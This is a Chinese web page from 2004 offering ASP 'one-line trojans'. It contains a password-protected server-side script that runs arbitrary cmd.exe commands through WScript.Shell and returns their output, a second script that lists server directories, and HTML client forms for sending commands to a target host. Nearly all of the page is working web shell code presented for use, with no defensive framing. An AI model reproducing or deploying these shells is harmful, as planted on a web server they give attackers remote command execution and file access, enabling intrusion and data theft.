asp一句话木马

upsdn首页 > 系统与网络 > 脚本与网站建设

一句话木马 服务器端
带验证:
——————————————cmd.asp————————————————
<%
   if request("authkey")="pic16f873a" then
%>
       <textarea readonly cols=80 rows=25>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
      </textarea>
<%
     end if
%>

带验证 客户端
——————————————cmd.html————————————————
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>    
Cmd :<input type=text name=cmd size=65 value="cmd">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">  
<Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
            frm.submit();"
type=button value="Send Command">
</FORM>
</div>

 

目录浏览

服务器端
_________________________________________
<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items

for each iii in diritems
  response.write   iii.path & "<font color=blue>[" & iii.size &"]</font><br>"
next
end if
%>
_________________________________________
客户端
__________________________________________
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Path:<input type=text name=path size=65 value="C:\">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">
<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">

</FORM>
</div>

作者:Greg   更新日期:2004-12-23
来源:本站特稿   浏览次数:

相关文章

• asp木马:RunAsAsp

相关评论   发表评论

• No Comments